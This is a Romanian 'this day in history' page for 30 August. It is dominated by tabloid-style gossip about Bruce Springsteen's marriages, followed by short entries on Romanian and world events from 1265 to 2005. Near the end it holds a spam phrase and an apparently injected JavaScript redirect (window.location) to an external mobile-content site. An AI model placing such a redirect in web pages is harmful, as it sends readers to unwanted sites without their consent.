30 august – Istoricul zilei

30 august

30 august

Intr-o zi de 30 august, in 1988, Julianne ii intenta divort sotului ei Bruce Springsteen, dupa ce un tabloid publicase poze ale acestuia impreuna cu muziciana Patti Scialfa, amanta sa, fotografii care ii prezentau pe cei doi in ipostaze tandre pe balconul unui hotel din Roma.

CD-Bruce-Springsteen

Bruce si actrita Julianne Phillips se cunoscusera in timpul turneului de promovare al albumului Born in the U.S.A., in 1984, si s-ua casatorit in Oregon, pe 13 mai 1985. Mariajul nu a durat prea mult, iar piesele de pe albumul lui Bruce Tunnel of Love vorbesc despre relatia lor nefericita. In timpul turneului Tunnel of Love Express, muzicianul a inceput o relatie cu Patti Scialfa. In primavara lui 1988, Phillips si Bruce se separau, pe 30 august incepeau actiunea de divort si aceasta se va finaliza pe 1 martie 1989. Springsteen a fost criticat de presa pentru relatia cu Patti, dar pe 25 iulie 1990 se nastea primul lor copil, Evan James Springsteen. In iunie 1991, Springsteen si Scialfa se casatoreau in resedinta lor din Beverly Hills. Cel de-al doilea copil, Jessica Rae Springsteen, s-a nascut in decembrie 1991, iar cel de-al treilea Samuel Ryan Springsteen, in ianuarie 1994. Incepand cu 1991, Springsteen a dus o viata destul de ferita de ochii presei si s-a mutat impreuna cu toata familia din Los Angeles in New Jersey, tocmai pentru a-si feri copiii de paparazzi. Totusi, casnicia sa nu a fost lipsita de furtuni, iar presa a speculat fiecare moment de slabiciune al cuplului. In 2006, rockerul american a fost nevoit sa dezminta zvonurile referitoare la presupusul lui divort de Patti Scialfa, dupa ce presa scrisese ca cei doi “s-au separat” ca urmare a prieteniei puternice aparute intre cantaret si vaduva uneia dintre victimele atentatelor de la 11 septembrie. Dupa trei ani de la acest incident, in 2009, Bruce Springsteen se trezea din nou in mijlocul unui scandal: el era “amantul” care statea la baza divortului dintre omul de afaceri Arthur J. Kelly si sotia sa, Ann C. Kelly. Bruce a fost acuzat de adulter de catre sotul inselat, prin repetate intalniri amoroase cu sotia sa, de-a lungul a mai multor ani si in secret. In fata judecatorilor care au prezidat procesul, cantaretul a fost prezentat ca principal motiv pentru cererea de divort. Bruce Springsteen a raspuns foarte evaziv pe blogul sau, spunand ca viata sa personala nu ar trebui sa fie obiect al discutiei publice. In acelasi an 2009, dupa o serie de tensiuni in cuplu, Bruce Springsteen si sotia sa Patti Scialfa au revenit la sentimente mai bune. Cu toate ca Patti intentase divort, cantaretul s-a prezentat in fata judecatorului spunand ca el nu doreste separarea de sotia sa si ca, in ceea ce-l priveste, legamantul luat in fata altarului cu 18 ani in urma este valabil si astazi. Demersul juridic a fost astfel suspendat, iar cei doi au cautat sa se reapropie. Intre timp, Patti a suferit un accident de calarie, dar, din fericire, s-a ales numai cu citeva zgirieturi si vinatai. Iata de ce, cu ocazia unui recital oferit in cadrul unei gale organizate in cinstea lui Tom Hanks la New York, Bruce Springsteen a cerut permisiunea publicului de a o chema pe sotia sa pe scena. Spectatorii au asistat la sarutul lor romantic, o declaratie publica, de altfel, ca lucrurile se reaseaza in familia lor.

Tot astazi:

Tot dintr-o zi de 30 august, din 1265, dateaza prima mentiune documentara a Hunedoarei

Pe 30 august 1535 se incheia inaltarea Bisericii “Sf. Dumitru” din Suceava (inceputa la 10 august 1534), ctitorie a lui Petru Rares, domn al Moldovei (1527-1538; 1541-1546).

In 1698, pe 30 august, aparea la Iasi prima scriere filosofica romaneasca: Divanul sau galceava inteleptului cu lumea sau giudetul sufletului cu trupul, de Dimitrie Cantemir.

La data de 30 august 1877 avea loc asaltul armatei romane asupra redutei turcesti Plevna, in timpul razboiului pentru independenta. Plevna este un oras in nordul Bulgariei, la 40 km distanta de Turnu Magurele. Localitatea este cunoscuta mai ales pentru rolul important pe care l-a avut in razboiul ruso-turc din 1877-78.
Caderea Plevnei in 1877 dupa patru luni de asediu din partea trupelor rusesti si romanesti i-a determinat pe turci sa ceara un armistitiu. Scena caderii Plevnei este redata in filmul Pentru Patrie in regia lui Sergiu Nicolaescu.

Tot intr-o zi de 30 august, in 1881, inginerul francez Clement Ader (1841-1926) patenta teatrofonul, primul sistem audio-stereo in Franta.

Pe 30 august 1914 avea loc primul spectacol al Companiei Marioara Voiculescu-Bulandra, cu piesa “Sotul ideal”, de Oscar Wilde.

In 1918, pe 30 august, era asasinat seful Directiei Politice de Stat a Rusiei bolsevice (C.E.K.A.), Uritki. In aceeasi zi, la Moscova, a avut loc atentatul Faniei Kaplan asupra lui Lenin. Lenin a fost impuscat, conform martorilor, de trei ori, doua gloante ranindu-l la umar si la piept. Conform declaratiilor Faniei Kaplan, ea a incercat sa-l ucida pe Lenin pentru ca il considera un „tradator” si pentru ca „… cu cat va trai mai mult, cu atat va ingropa mai adanc ideea de socialism”. Fania Kaplan nu a fost judecata. A fost impuscata la ora 4 dimineata, in data de 4 septembrie 1918, de catre comandantul militar al Kremlinului.

La data de 30 august 1940 era incheiat al doilea protocol al Dictatului de la Viena. Romania a fost nevoita sa cedeze Ungariei aproape jumatate (43.492 km²) din teritoriul Transilvaniei.

Pe 30 august 1944, Romania rupea relatiile diplomatice cu Ungaria horthysta.

In 1948, pe 30 august, era creata Directia Generala a Securitatii Poporului (Securitatea).

La data de 30 august 1972, John Lennon si Yoko Ono sustineau un concert umanitar in Madison Square Garden in New York. In concertul One on One, alaturi de ei au aparut Stevie Wonder si Roberta Flack. Peste 250.000 de dolari au fost stransi pentru copiii cu retard psihic.

Tot intr-o zi de 30 august, in 1986, avea loc un cutremur de pamant, in Vrancea, cu magnitudinea de 7,2, adancimea de 140 km.

Pe 30 august 1989, Izzy Stradlin de la Guns N’ Roses era arestat dupa ce deranjase linistea publica in timpul unui zbor al unei curse americane. Stradlin a urinat pe podea, a agresat verbal echipajul de zbor si a fumat in zona pentru nefumatori.

In 1991, pe 30 august, atletul american Mike Powell reusea sa depaseasca recordul mondial la saritura in lungime, record stabilit in 1968 de Bob Beamon.
La data de 30 august 2003, Stella McCartney se casatorea cu Alasdhiar Willis, in Scotia. Sir Paul McCartney, Madonna, Chrissie Hynde si Chris Martin de la Coldplay au fost doar cativa dintre invitatii celebri.

Pe 30 august 2005, uraganul Katrina devasta sudul S.U.A.. Uraganul Katrina a fost un uragan care s-a format pe 23 august 2005, in timpul sezonului de uragane din Atlantic din acel an si a cauzat distrugeri masive in Statele Unite ale Americii, pe coasta Golfului Mexic. Majoritatea pagubelor materiale si a pierderilor de vieti omenesti au fost localizate in orasul New Orleans, care a fost inundat dupa ce sistemul de diguri din zona a cedat, in unele cazuri, la mult timp dupa ce furtuna avansase deja spre continent. Alte distrugeri au avut loc in statele Mississippi si Alabama, la distante de pana la 160 km de centrul furtunii. Cel putin 1.836 de persoane si-au pierdut viata din cauza Uraganului Katrina si a inundatiilor ce l-au urmat, acesta fiind cel mai devastator uragan din S.U.A. de dupa Uraganul Okeechobee din 1928. Pagubele materiale produse de Katrina sunt estimate la 81.2 miliarde de dolari americani (la nivelul anului 2005), cele mai mari pagube produse de un uragan din istoria Statelor Unite.

Astazi isi serbeaza ziua de nastere: A.G. Weinberger, compozitor si interpret de muzica de jazz si Cameron Diaz, actrita americana.

Astazi este Ziua Internationala a Persoanelor Disparute. buy or order a paper

Surse: en.wikipedia.org/wiki/Main_Page, www.440.com/twtd/today.html, www.thisdayinmusic.com/

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *